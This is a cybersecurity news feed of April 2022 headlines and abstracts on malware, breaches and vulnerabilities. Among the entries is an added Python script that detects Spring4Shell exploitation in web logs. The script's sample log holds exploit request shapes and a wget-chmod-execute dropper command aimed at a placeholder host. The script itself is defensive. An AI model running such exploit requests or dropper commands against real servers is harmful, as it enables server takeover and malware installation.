Abstract A new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. "The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites, and local government sites," Avast researchers Pavel Novák and Jan Rubín  said  in a report published last week. Traffic direction systems are used by threat actors to determine whether or not a target is of interest and should be redirected to a malicious domain under their control and act as a gateway to compromise their systems with malware. Earlier this January, the BlackBerry Research and Intelligence Team detailed another TDS called  Prometheus  that has been put to use in different campaigns mounted by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader, and SocGholish malware. What makes Parrot TDS stand out is its huge reach,

The Hacker News

April 11, 2022 – Government

CISA warns orgs of WatchGuard bug exploited by Russian state hackers Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal civilian agencies and urged all US organizations on Monday to patch an actively exploited bug impacting WatchGuard Firebox and XTM firewall appliances.

BleepingComputer

April 11, 2022 – Botnet

Russia-linked Cyclops Blink Botnet Taken Down Full Text

Abstract The FBI announced taking down the Cyclops Blink botnet, which was used to target firewall appliances and SOHO networking devices. It was under the control of the Russian Sandworm group. The operation's initial court authorization was given on March 18, the botnet infection was fully removed from all id ... Read More

Cyware Alerts - Hacker News

April 11, 2022 – Breach

Anonymous hacked Russia’s Ministry of Culture and leaked 446 GB Full Text

Abstract The Anonymous collective has hacked Russia's Ministry of Culture and leaked 446 GB of data through the DDoSecrets platform. Data leak service DDoSecrets has published over 700 GB of data allegedly stolen from the Russian government, including over...

Security Affairs

April 11, 2022 – Malware

Rise in npm protestware: another open source dev calls Russia out Full Text

Abstract Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.

BleepingComputer

April 11, 2022 – Attack

Operation Bearded Barbie Aims to Catfish Israeli Officials Full Text

Abstract AridViper APT group was found targeting high-ranking Israeli officials in a cyberespionage campaign to spy and steal data by compromising their systems and mobile devices. The attackers have created various fake Facebook profiles with fabricated identities and stolen or AI-generated images of good- ... Read More

Cyware Alerts - Hacker News

April 11, 2022 – Malware

FFDroider, a new information-stealing malware disguised as Telegram app Full Text

Abstract Cybersecurity researchers spotted a new Windows information-stealing malware, named FFDroider, designed to steal credentials and cookies. Cybersecurity researchers from Zscaler ThreatLabz warn of a new information-stealing malware, named FFDroider,...

Security Affairs

April 11, 2022 – Malware

Qbot malware switches to new Windows Installer infection vector Full Text

Abstract The Qbot botnet is now pushing malware payloads via phishing emails with password-protected ZIP archive attachments containing malicious MSI Windows Installer packages.

BleepingComputer

April 11, 2022 – Attack

Parrot TDS: A New Web Redirect Service Full Text

Abstract Avast laid bare an attack campaign abusing the new Parrot TDS, which has infected over 16,500 websites across different verticals, to deliver RATs via bogus browser update prompts. The campaign started in February, while the signs of Parrot activity have been traced back to October last year. Exper ... Read More

Cyware Alerts - Hacker News

April 11, 2022 – Breach

SuperCare Health discloses a data breach that Impacted +300K people Full Text

Abstract SuperCare Health, a leading respiratory care provider in the Western U.S, disclosed a data breach that impacted more than 300,000 individuals. SuperCare Health disclosed a security breach that has led to the exposure of personal information belonging...

Security Affairs

April 11, 2022 – Attack

Luxury fashion house Zegna confirms August ransomware attack Full Text

Abstract The Italian luxury fashion company Ermenegildo Zegna has disclosed a ransomware incident from August 2021 that has resulted in an extensive IT systems outage.

BleepingComputer

April 11, 2022 – Vulnerabilities

Access control vulnerability in Easy!Appointments platform exposed sensitive personal data Full Text

Abstract An access control vulnerability in open-source scheduling platform Easy!Appointments gave unauthenticated attackers easy access to personally identifiable information (PII), a security researcher has revealed.

The Daily Swig

April 11, 2022 – Malware

Android banking malware intercepts calls to customer support Full Text

Abstract A banking trojan for Android that researchers call Fakecalls comes with a powerful capability that enables it to take over calls to a bank's customer support number and connect the victim directly with the cybercriminals operating the malware.

BleepingComputer

April 11, 2022 – Business

HelpSystems acquires Terranova Security to offer security awareness solutions for businesses Full Text

Abstract HelpSystems announced the acquisition of Terranova Security, an organization providing phishing simulation, privacy awareness, and security awareness training services across the globe.

Help Net Security

April 11, 2022 – Government

Lawmakers ask Energy Department to take point on sector digital security Full Text

Abstract A bipartisan group of House and Senate lawmakers late last week urged the head of the U.S. Energy Department to take the lead in shaping the massive energy sector’s cybersecurity.

The Record

April 11, 2022 – General

Organizations must be doing something good: Payment fraud activity is declining Full Text

Abstract Results from an Association for Financial Professionals (AFP) survey are encouraging, as 71% of organizations report having been victims of payments fraud activity in 2021, lower than the 81% reported in 2019.

Help Net Security

April 11, 2022 – Malware

Fakecalls Banking Trojan Makes Fake Calls to Korean Bank Customers Full Text

Abstract Fakecalls mimics the mobile apps of popular Korean banks, among them KB (Kookmin Bank) and KakaoBank. Curiously, in addition to the usual logos, the Trojan’s creators display the support numbers of the respective banks on the Fakecalls screen.

Kaspersky Lab

April 11, 2022 – Breach

Over 300,000 People Impacted by Data Breach at SuperCare Health Full Text

Abstract In a data security notice posted on its website, SuperCare Health said the intrusion was discovered on July 27, 2021, when it noticed unauthorized activity on some systems.

Security Week

April 11, 2022 – Malware

Researchers warn of FFDroider and Lightning info-stealers targeting users in the wild Full Text

Abstract Cybersecurity researchers are warning of two different information-stealing malware, named  FFDroider  and  Lightning Stealer , that are capable of siphoning data and launching further attacks. "Designed to send stolen credentials and cookies to a Command & Control server, FFDroider disguises itself on victim's machines to look like the instant messaging application 'Telegram,'" Zscaler ThreatLabz researchers Avinash Kumar and Niraj Shivtarkar  said  in a report published last week. Information stealers, as the name implies, are equipped to harvest sensitive information from compromised machines, such as keystrokes, screenshots, files, saved passwords and cookies from web browsers, that are then transmitted to a remote attacker-controlled domain.  FFDroider is distributed through cracked versions of installers and freeware with the primary objective of stealing cookies and credentials associated with popular social media and e-commerce platforms and using

The Hacker News

April 11, 2022 – Solution

Microsoft’s Autopatch feature improves the patch management process Full Text

Abstract Microsoft announced a feature called Autopatch that will allow organizations to keep their systems up-to-date starting with Windows Enterprise E3 (July 2022). Microsoft recently announced the implementation of a new feature called Autopatch starting...

Security Affairs

April 11, 2022 – General

More organizations are paying the ransom. Why? Full Text

Abstract Most organizations (71%) have been hit by ransomware in 2022, and most of those (63%) opted for paying the requested ransom, the 2022 Cyberthreat Defense Report (CDR) by the CyberEdge Group has shown.

Help Net Security

April 11, 2022 – Solution

Dependency Review GitHub Action prevents adding known flaws in the code Full Text

Abstract Dependency Review GitHub Action scans users' pull requests for dependency changes and will raise an error if any new dependencies have existing flaws. GitHub announced Dependency Review GitHub Action which scans users' pull requests for dependency...

Security Affairs

April 11, 2022 – Solution

OpenSSH now defaults to protecting against quantum computer attacks Full Text

Abstract Post-quantum cryptography has arrived by default with the release of OpenSSH 9.0 and the adoption of the hybrid Streamlined NTRU Prime + x25519 key exchange method (sntrup761x25519-sha512@openssh.com), which protects captured SSH sessions against later decryption by a quantum computer.

ZDNet

April 11, 2022 – Vulnerabilities

Securing Easy Appointments and earning CVE-2022-0482 Full Text

Abstract Easy Appointments contained a very dangerous Broken Access Control vulnerability tracked as CVE-2022-0482 that was exposing PII. Another day, another threat to your data. The recently discovered CVE-2022-0482 is a Broken Access Control vulnerability...

Security Affairs

April 11, 2022 – Phishing

Eavesdropping scam: A new scam call tactic Full Text

Abstract Hiya has detected the newest scam call tactic, the eavesdropping scam. The new scam aims to get users to call back by leaving vague voicemail messages where an unknown voice is heard talking about the potential victim.

Help Net Security

April 11, 2022 – General

Accounts Deceivable: Email Scam Costliest Type of Cybercrime Full Text

Abstract The huge payoffs and low risks associated with BEC scams have attracted criminals worldwide. Some flaunt their ill-gotten riches on social media, posing in pictures next to Ferraris, Bentleys, and stacks of cash.

Security Week

April 11, 2022 – Vulnerabilities

Human activated risk still a pain point for organizations Full Text

Abstract Egress announced the results of a report, which revealed that 56% of IT leaders say that their non-technical staff is only ‘somewhat’ prepared, or ‘not at all’ prepared, for a security attack.

Help Net Security

April 11, 2022 – Botnet

Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware Full Text

Abstract Trend Micro Threat Research observed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965, which allows malicious actors to weaponize and execute the Mirai botnet malware.

Trend Micro

April 10, 2022 – Malware

New Meta information stealer distributed in malspam campaign Full Text

Abstract Independent analyst Brad Duncan has spotted a malspam campaign delivering META, a new info-stealer malware that appears to be rising in popularity among cybercriminals.

BleepingComputer

April 10, 2022 – Solution

Microsoft’s New Autopatch Feature to Help Businesses Keep Their Systems Up-to-Date Full Text

Abstract Microsoft last week announced that it intends to make generally available a feature called Autopatch as part of Windows Enterprise E3 in July 2022. "This service will keep Windows and Office software on enrolled endpoints up-to-date automatically, at no additional cost,"  said  Lior Bela, senior product marketing manager at Microsoft, in a post last week. "The second Tuesday of every month will be 'just another Tuesday.'" Windows Autopatch is intended to work with all supported versions of Windows 10, Windows 11, and Windows 365 for Enterprise. Windows Server OS and Windows 365 for Business, however, are not supported. The tech giant said the feature is aimed at tackling the complexity associated with software updates in enterprise IT environments as well as closing security gaps introduced as a result of not applying patches in a timely fashion, thereby opening the door to potential new threats.  The managed service works by applying the updates acro

The Hacker News

April 10, 2022 – General

Apr 03 – Apr 09 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion of Ukraine that occurred in the previous weeks: April...

Security Affairs

April 10, 2022 – Ransomware

NB65 group targets Russia with a modified version of Conti’s ransomware Full Text

Abstract NB65 hacking group created its ransomware based on the leaked source code of the Conti ransomware and targets Russia. According to BleepingComputer, NB65 hacking group is targeting Russian organizations with ransomware that they have developed using...

Security Affairs

April 10, 2022 – General

Security Affairs newsletter Round 360 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

April 10, 2022 – Hacker

Facebook blocked Russia and Belarus threat actors’ activity against Ukraine Full Text

Abstract Facebook/Meta said Russia-linked threat actors are attempting to use the social network against Ukraine with hate speech, bullying, and fake news. Facebook/Meta revealed that Russia-linked threat actors are attempting to weaponize the social network...

Security Affairs

April 09, 2022 – Attack

Hackers use Conti’s leaked ransomware to attack Russian companies Full Text

Abstract A hacking group used the Conti's leaked ransomware source code to create their own ransomware to use in cyberattacks against Russian organizations.

BleepingComputer

April 09, 2022 – Malware

New Android banking malware remotely takes control of your device Full Text

Abstract A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud.

BleepingComputer

April 9, 2022 – Denial Of Service

A DDoS attack took down Finnish govt sites as Ukraine’s President addresses MPs Full Text

Abstract A massive DDoS attack took down Finnish government websites while Ukrainian President Zelenskyy addressed Finland's members of parliament (MPs). On April 8, a denial-of-service attack took down the websites of the Finnish ministries of Defense and Foreign...

Security Affairs

April 9, 2022 – Malware

SharkBot Banking Trojan spreads through fake AV apps on Google Play Full Text

Abstract Experts discovered malicious Android apps on the Google Play Store masqueraded as antivirus solutions spreading the SharkBot Trojan. Researchers from the Check Point Research (CPR) team discovered several malicious Android apps on the official Google...

Security Affairs

April 9, 2022 – Hacker

China-linked threat actors target Indian Power Grid organizations Full Text

Abstract China-linked threat actors continue to target Indian power grid organizations, most of the attacks involved the ShadowPad backdoor. Recorded Future's Insikt Group researchers uncovered a campaign conducted by a China-linked threat actor targeting...

Security Affairs

April 08, 2022 – Botnet

Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware Full Text

Abstract The recently disclosed critical Spring4Shell vulnerability is being actively exploited by threat actors to execute the Mirai botnet malware, particularly in the Singapore region since the start of April 2022. "The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using 'chmod,'" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma said in a report published Friday. Tracked as CVE-2022-22965 (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices. The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation." This is

The Hacker News

April 08, 2022 – Breach

Snap-on discloses data breach claimed by Conti ransomware gang Full Text

Abstract American automotive tools manufacturer Snap-on announced a data breach exposing associate and franchisee data after the Conti ransomware gang began leaking the company's data in March.

BleepingComputer

April 8, 2022 – Criminals

Looking Inside Pandora’s Box Full Text

Abstract The threat group uses the double extortion method to increase pressure on the victim. This means that they not only encrypt the victim’s files, but also exfiltrate them and threaten to release the data if the victim does not pay.

Fortinet

April 08, 2022 – Hacker

Chinese Hacker Groups Continue to Target Indian Power Grid Assets Full Text

Abstract An ongoing onslaught against Indian power grid organizations has been attributed to China-linked adversaries, one year after a concerted campaign targeting critical infrastructure in the country came to light. Most of the intrusions involved a modular backdoor named ShadowPad, according to Recorded Future's Insikt Group, a sophisticated remote access trojan which has been dubbed a "masterpiece of privately sold malware in Chinese espionage." "ShadowPad continues to be employed by an ever-increasing number of People's Liberation Army (PLA) and Ministry of State Security (MSS)-linked groups, with its origins linked to known MSS contractors first using the tool in their own operations and later likely acting as a digital quartermaster," the researchers said. The goal of the sustained campaign, the cybersecurity company said, is to facilitate intelligence gathering pertaining to critical infrastructure systems in preparation for future contingency

The Hacker News

April 8, 2022 – General

15 Cybersecurity Measures for the Cloud Era Full Text

Abstract Which are the most important cybersecurity measures that businesses can take to protect themselves in the cloud era? We are now firmly in the era of cloud data and storage. In fact, it’s become quite difficult to find a service that doesn’t rely...

Security Affairs

April 08, 2022 – Solution

GitHub can now alert of supply-chain bugs in new dependencies Full Text

Abstract GitHub can now block and alert you of pull requests that introduce new dependencies impacted by known supply chain vulnerabilities.

BleepingComputer

April 8, 2022 – Business

Blockchain Security Firm CertiK Raises $88 Million at $2 Billion Valuation Full Text

Abstract The new investment round was led by Advent International, Insight Partners, and Tiger Global, with participation from Goldman Sachs and previous investors Lightspeed Venture Partners and Sequoia.

Security Week

April 08, 2022 – Ransomware

Researchers Connect BlackCat Ransomware with Past BlackMatter Malware Activity Full Text

Abstract Cybersecurity researchers have uncovered further links between BlackCat (aka AlphaV) and BlackMatter ransomware families, the former of which emerged as a replacement following international scrutiny last year. "At least some members of the new BlackCat group have links to the BlackMatter group, because they modified and reused a custom exfiltration tool [...] and which has only been observed in BlackMatter activity," Kaspersky researchers said in a new analysis. The tool, dubbed Fendr, has not only been upgraded to include more file types but also used by the gang extensively to steal data from corporate networks in December 2021 and January 2022 prior to encryption, in a popular tactic called double extortion. The findings come less than a month after Cisco Talos researchers identified overlaps in the tactics, techniques, and procedures (TTPs) between BlackCat and BlackMatter, describing the new ransomware variant as a case of "vertical business expansion."

The Hacker News

April 8, 2022 – Attack

Anonymous and the IT ARMY of Ukraine continue to target Russian entities Full Text

Abstract The popular hacking collective Anonymous and the IT ARMY of Ukraine continue to target Russian government entities and private businesses. This week Anonymous claimed to have hacked multiple private businesses and leaked their data through the DDoSecrets platform. The...

Security Affairs

April 08, 2022 – Malware

Mirai malware now delivered using Spring4Shell exploits Full Text

Abstract The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.

BleepingComputer
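The three Spring4Shell entries above (Trend Micro's report, The Hacker News summary of it, and this BleepingComputer item) describe the same chain: exploitation of CVE-2022-22965, then a Mirai sample dropped to /tmp, made executable with chmod and run. The script below is an added example, not code from any of those sources. It scans web-server access logs for the two stages: the publicly documented exploit shape, a request that abuses Spring data binding to set properties under class.module.classLoader (the path from a bound bean to the Tomcat class loader), and a follow-up command line that writes to /tmp and chmods it. The log lines are constructed for this example and use documentation address ranges; the webshell filename and parameter values are placeholders, not indicators.

```python
"""Spot CVE-2022-22965 (Spring4Shell) exploitation and the /tmp dropper stage in access logs.

Added example, not code from Trend Micro, The Hacker News or BleepingComputer.
SAMPLE_LOG is constructed; addresses are documentation ranges, the script name
and parameter values are placeholders.
"""
import re
from urllib.parse import unquote_plus

# Combined log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Property path the public CVE-2022-22965 exploit binds. Checked after URL decoding and
# case-insensitively, so %2E-encoded dots or odd casing do not slip past.
CLASSLOADER_RE = re.compile(r"class\.module\.classloader", re.IGNORECASE)
CHMOD_RE = re.compile(r"\bchmod\b")

SAMPLE_LOG = [  # constructed for this example
    '203.0.113.7 - - [08/Apr/2022:10:01:02 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=x HTTP/1.1" 200 512',
    '203.0.113.7 - - [08/Apr/2022:10:01:03 +0000] "GET /?class%2Emodule%2EclassLoader%2Eresources%2Econtext%2Eparent%2Epipeline%2Efirst%2Esuffix=%2Ejsp HTTP/1.1" 200 512',
    '203.0.113.7 - - [08/Apr/2022:10:01:09 +0000] "GET /shell.jsp?cmd=wget+http://198.51.100.5/bot.x86+-O+/tmp/bot.x86;chmod+777+/tmp/bot.x86;/tmp/bot.x86 HTTP/1.1" 200 77',
    '198.51.100.20 - - [08/Apr/2022:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def classify(line):
    """Return a finding dict for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined log format: nothing to judge
    # Decode twice: exploit kits often double-encode to get past naive filters.
    target = unquote_plus(unquote_plus(m.group("target")))
    if CLASSLOADER_RE.search(target):
        kind = "spring4shell-binding"
    elif "/tmp/" in target and CHMOD_RE.search(target):
        kind = "dropper-command"
    else:
        return None
    return {"ip": m.group("ip"), "kind": kind, "status": int(m.group("status")), "target": target}


def scan(lines):
    """All findings in log order; a 200 on a binding attempt deserves the closest look."""
    return [f for f in (classify(line) for line in lines) if f]


def full_chain_sources(lines):
    """Client IPs seen both binding class.module.classLoader and later running a dropper."""
    seen = {}
    for f in scan(lines):
        seen.setdefault(f["ip"], set()).add(f["kind"])
    wanted = {"spring4shell-binding", "dropper-command"}
    return sorted(ip for ip, kinds in seen.items() if wanted <= kinds)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["kind"], f["status"], f["target"][:70])
    print("sources with the full chain:", full_chain_sources(SAMPLE_LOG))
```

Access logs only carry the query string, so a payload sent in a POST body is invisible here; that stage needs a proxy or WAF that logs bodies. The fix is Spring Framework 5.3.18 or 5.2.20; for applications that cannot upgrade yet, Spring's published workaround is a ControllerAdvice whose @InitBinder disallows binding of fields matching "class.*", "Class.*", "*.class.*" and "*.Class.*", which removes the property path this script looks for.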

April 8, 2022 – Outage

WonderHero Game Disabled After Hackers Steal $320,000 in Cryptocurrency Full Text

Abstract The operators of cryptocurrency play-to-earn game WonderHero have disabled the service after hackers stole about $320,000 worth of Binance Coin (BNB). The attack caused the price of WonderHero’s own coin, WND, to plummet more than 90%.

The Record

April 08, 2022 – Policy and Law

Ukrainian FIN7 Hacker Gets 5-Year Sentence in the United States Full Text

Abstract A 32-year-old Ukrainian national has been  sentenced to five years in prison  in the U.S. for the individual's criminal work as a "high-level hacker" in the financially motivated group FIN7. Denys Iarmak, who worked as a penetration tester for the cartel from November 2016 through November 2018, had been previously arrested in Bangkok, Thailand in November 2019, before being extradited to the U.S. in May 2020. In November 2021, Iarmak had pleaded guilty to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking. FIN7 has been attributed to a number of attacks that have led to the theft of more than 20 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations in the U.S, costing the victims $1 billion in losses. The criminal gang, also known as Carbanak Group and the Navigator Group, has a track record of hitting restaurant, gambling, and hospitality indu

The Hacker News

April 8, 2022 – Policy and Law

A Ukrainian man is the third FIN7 member sentenced in the United States Full Text

Abstract A Ukrainian man was sentenced in the US to 5 years in prison for his criminal activity in the cybercrime group FIN7. Denys Iarmak, a Ukrainian national (32), has been sentenced to five years in prison in the U.S. for high-level hacking activity...

Security Affairs

April 08, 2022 – Vulnerabilities

Raspberry Pi removes default user to hinder brute-force attacks Full Text

Abstract An update to Raspberry Pi OS Bullseye has removed the default 'pi' user to make it harder for attackers to find and compromise Internet-exposed Raspberry Pi devices using default credentials.

BleepingComputer

April 8, 2022 – Attack

SaintBear Uses New Set of Payloads to Target Ukrainian Organizations Full Text

Abstract Researchers found the SaintBear actors targeting Ukrainian organizations using macro-embedded documents in their latest campaign, which delivers different Elephant payloads. SaintBear has been actively performing cyberespionage campaigns aimed at Ukraine since 2021. For better protection, organizations ...

Cyware Alerts - Hacker News

April 08, 2022 – Policy and Law

Microsoft Obtains Court Order to Take Down Domains Used to Target Ukraine Full Text

Abstract Microsoft on Thursday disclosed that it obtained a court order to take control of seven domains used by APT28, a state-sponsored group operated by Russia's military intelligence service, with the goal of neutralizing its attacks on Ukraine. "We have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium's current use of these domains and enable victim notifications," Tom Burt, Microsoft's corporate vice president of customer security and trust, said. APT28, also known by the names Sofacy, Sednit, Pawn Storm, Fancy Bear, Iron Twilight, and Strontium, is a cyber espionage group and an advanced persistent threat that's known to be active since 2009, striking media, governments, military, and international non-governmental organizations (NGOs) that often have a security focus. The tech giant noted that the sinkholed infrastructure was used by the threat actor to target Ukrainian institutions as well as gov

The Hacker News

April 8, 2022 – APT

Microsoft disrupted APT28 attacks on Ukraine through a court order Full Text

Abstract Microsoft obtained a court order to take over seven domains used by the Russia-linked APT28 group to target Ukraine. Microsoft on Thursday announced it has obtained a court order to take over seven domains used by Russia-linked cyberespionage group...

Security Affairs

April 8, 2022 – Outage

Ransomware Forces North Carolina A&T University to Take Systems and Services Offline Full Text

Abstract North Carolina A&T State University, the largest historically black college in the US, was recently struck by a ransomware group called ALPHV, sending university staff into a scramble to restore services last month.

ARS Technica

April 8, 2022 – Attack

Hamas-linked threat actors target high-profile Israeli individuals Full Text

Abstract Hamas-linked threat actors conducted an elaborate campaign aimed at high-profile Israeli individuals employed in sensitive sectors. Researchers from Cybereason observed a sophisticated cyberespionage campaign conducted by APT-C-23 group campaigns...

Security Affairs

April 8, 2022 – Hacker

FIN7 Forays into Ransomware Attack Landscape with New Tools Full Text

Abstract Mandiant warned against the evil ambitions of the FIN7 group, which has shown strong signs of entering ransomware operations. The group’s presence has been reported before attack events from Maze, Darkside, BlackCat, and Ryuk. Recently, it has been observed showing off a novel backdoor and new mali ...

Cyware Alerts - Hacker News

April 8, 2022 – Vulnerabilities

Command injection bug patched in Ruby library for converting AsciiDoc files Full Text

Abstract Developers have issued a patch for a popular Ruby library used to parse and convert AsciiDoc files, to safeguard servers against a newly discovered command injection vulnerability.

The Daily Swig

April 8, 2022 – Vulnerabilities

Researchers Discover Multiple Vulnerabilities in AutoDesk Products Full Text

Abstract Towards the end of 2021, Fortinet security researchers discovered and reported multiple zero-day vulnerabilities in AutoDesk products: DWG TrueView, Design Review, and Navisworks.

Fortinet

April 07, 2022 – Malware

New Octo Banking Trojan Spreading via Fake Apps on Google Play Store Full Text

Abstract A number of rogue Android apps that have been cumulatively installed from the official Google Play Store more than 50,000 times are being used to target banks and other financial entities. The rental banking trojan, dubbed Octo, is said to be a rebrand of another Android malware called ExobotCompact, which, in turn, is a "lite" replacement for its Exobot predecessor, Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News. Exobot is also likely said to have paved the way for a separate descendant called Coper, that was initially discovered targeting Colombian users around July 2021, with newer infections targeting Android users in different European countries. "Coper malware apps are modular in design and include a multi-stage infection method and many defensive tactics to survive removal attempts," cybersecurity company Cyble noted in an analysis of the malware last month. Like other Android banking trojans, the rogue apps

The Hacker News

April 07, 2022 – APT

Microsoft takes down APT28 domains used in attacks against Ukraine Full Text

Abstract Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure.

BleepingComputer

April 7, 2022 – Malware

The Mysterious Borat RAT is an All-In-One Threat Full Text

Abstract Cyble discovered a new RAT, dubbed Borat. With a builder, feature modules, and a server certificate, it offers ransomware and DDoS attack services. It is not known whether Borat is being sold or freely shared among cybercriminals. While analyzing the campaign and digging into its origin, a res ...

Cyware Alerts - Hacker News

April 07, 2022 – Malware

First Malware Targeting AWS Lambda Serverless Platform Discovered Full Text

Abstract A first-of-its-kind malware targeting Amazon Web Services' (AWS) Lambda serverless computing platform has been discovered in the wild. Dubbed "Denonia" after the name of the domain it communicates with, "the malware uses newer address resolution techniques for command and control traffic to evade typical detection measures and virtual network access controls," Cado Labs researcher Matt Muir said. The artifact analyzed by the cybersecurity company was uploaded to the VirusTotal database on February 25, 2022, sporting the name "python" and packaged as a 64-bit ELF executable. However, the filename is a misnomer, as Denonia is programmed in Go and harbors a customized variant of the XMRig cryptocurrency mining software. That said, the mode of initial access is unknown, although it's suspected it may have involved the compromise of AWS Access and Secret Keys. Another notable feature of the malware is its use of DNS over HTTPS (DoH) for c

The Hacker News

April 7, 2022 – Malware

Colibri Loader employs clever persistence mechanism Full Text

Abstract Recently discovered malware loader Colibri leverages a trivial and efficient persistence mechanism to deploy Windows Vidar data stealer. Malwarebytes researchers observed a new loader, dubbed Colibri, which has been used to deploy a Windows information...

Security Affairs

April 7, 2022 – Malware

MacOS Malware: Myth vs. Truth – Podcast Full Text

Abstract Huntress Labs R&D Director Jamie Levy busts the old “Macs don’t get viruses” myth and offers tips on how MacOS malware differs and how to protect against it.

Threatpost

April 07, 2022 – Policy and Law

FIN7 hacking group ‘pen tester’ sentenced to 5 years in prison Full Text

Abstract Denys Iarmak, a Ukrainian member and a "pen tester" for the FIN7 financially-motivated hacking group, was sentenced on Thursday to 5 years in prison for breaching victims' networks and stealing credit card information for roughly two years, between November 2016 and November 2018.

BleepingComputer

April 7, 2022 – Vulnerabilities

Zero-Day Bugs Bug the Biggies Full Text

Abstract In the past few days, several attackers have been observed exploiting new zero-day vulnerabilities in commonly used software products by Google, Apple, and others. Apple has released emergency fixes for two zero-day flaws. Trend Micro fixed a high-severity vulnerability in its Apex Central. Meanwhi ...

Cyware Alerts - Hacker News

April 07, 2022 – Attack

Hamas-linked Hackers Targeting High-Ranking Israelis Using ‘Catfish’ Lures Full Text

Abstract A threat actor with affiliations to the cyber warfare division of Hamas has been linked to an "elaborate campaign" targeting high-profile Israeli individuals employed in sensitive defense, law enforcement, and emergency services organizations. "The campaign operators use sophisticated social engineering techniques, ultimately aimed to deliver previously undocumented backdoors for Windows and Android devices," cybersecurity company Cybereason said in a Wednesday report. "The goal behind the attack was to extract sensitive information from the victims' devices for espionage purposes." The monthslong intrusions, codenamed "Operation Bearded Barbie," have been attributed to an Arabic-speaking and politically-motivated group called Arid Viper, which operates out of the Middle East and is also known by the monikers APT-C-23 and Desert Falcon. Most recently, the threat actor was held responsible for attacks aimed at Palestinian activists

The Hacker News

April 7, 2022 – Vulnerabilities

CVE-2022-22292 flaw could allow hacking of Samsung Android devices Full Text

Abstract Experts discovered a vulnerability, tracked as CVE-2022-22292, which can be exploited to compromise Android 9, 10, 11, and 12 devices. Researchers from mobile cybersecurity firm Kryptowire discovered a vulnerability, tracked as CVE-2022-22292, in Android...

Security Affairs

April 07, 2022 – Solution

Google boosts Android security with new set of dev policy changes Full Text

Abstract Google has announced several key policy changes for Android application developers that will increase the security of users, Google Play, and the apps offered by the service.

BleepingComputer

April 7, 2022 – Privacy

New Spyware Actively Targets Android Users Full Text

Abstract Android spyware impersonating a process manager app targets users and steals their data. While analyzing the spyware, the research team discovered that it downloads additional payloads to compromised devices. Organizations and users are advised to always monitor and review the app permiss ...

Cyware Alerts - Hacker News

April 07, 2022 – Breach

Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022 Full Text

Abstract During the last week of March, three major tech companies - Microsoft, Okta, and HubSpot - reported significant data breaches. DEV-0537, also known as LAPSUS$, performed the first two. This highly sophisticated group utilizes state-of-the-art attack vectors to great success. Meanwhile, the group behind the HubSpot breach was not disclosed. This blog will review the three breaches based on publicly disclosed information and suggest best practices to minimize the risk of such attacks succeeding against your organization. HubSpot - Employee Access: On March 21, 2022, HubSpot reported the breach which happened on March 18. Malicious actors compromised a HubSpot employee account that the employee used for customer support. This allowed malicious actors the ability to access and export contact data using the employee's access to several HubSpot accounts. With little information regarding this breach, defending against an attack is challenging, but a key configuration within HubSpo

The Hacker News

April 7, 2022 – Vulnerabilities

CVE-2022-0778 OpenSSL flaw affects multiple Palo Alto devices Full Text

Abstract Palo Alto Networks plans to fix CVE-2022-0778 OpenSSL flaw in some of its firewall, VPN, and XDR, products during April 2022. In Mid March, OpenSSL released updates to address a high-severity denial-of-service (DoS) vulnerability, tracked as CVE-2022-0778,...

Security Affairs

April 07, 2022 – Malware

New malware targets serverless AWS Lambda with cryptominers Full Text

Abstract Security researchers have discovered the first malware specifically developed to target Amazon Web Services (AWS) Lambda cloud environments with cryptominers.

BleepingComputer

April 7, 2022 – Malware

Beastmode Powered With Newly Added Exploits Full Text

Abstract A Mirai variant called Beastmode was found exploiting disclosed vulnerabilities in TOTOLINK routers. Attackers abused five new exploits within a month. Beastmode has also added some older bugs for a variety of routers from different vendors, all rated 9.8 on the CVSS scale. TOTOLINK device users ar ...

Cyware Alerts - Hacker News

April 07, 2022 – Malware

SharkBot Banking Trojan Resurfaces On Google Play Store Hidden Behind 7 New Apps Full Text

